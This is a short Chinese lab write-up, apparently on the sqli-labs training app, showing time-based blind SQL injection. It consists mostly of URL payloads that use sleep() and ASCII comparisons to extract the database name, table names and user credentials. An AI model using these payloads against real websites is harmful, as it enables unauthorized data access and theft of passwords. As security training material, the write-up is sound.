初始界面:
后面不管输啥都是you are in.......
淦,直接sleep()猜吧。 使用ascll码对照。反正都是you are in..... 对与不对的区别就是成功就会延时,没成功就立刻结束,既然都是you are in.....,后边的截图我就放延时的截图了。
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ 
s
?id=1' and if(ascii(substr(database(),2,1))=101,sleep(5),1)--+
se
?id=1' and if(ascii(substr(database(),3,1))=99,sleep(5),1)--+
sec
以此类推,最后可以得到数据库名为security
然后是security的数据表:
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1)--+
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,sleep(5),1)--+
以此类推,最后可以得到第一个表名为emails
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114,sleep(5),1)--+
可以得到第二个表名为referers
以此类推,我们可以得到所有的数据表emails,referers,uagents,users
猜users的内容:
?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))=44,1,sleep(5))--+
顺着这个接着猜下去可以获得数据列username,password的所有内容 。
1693
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
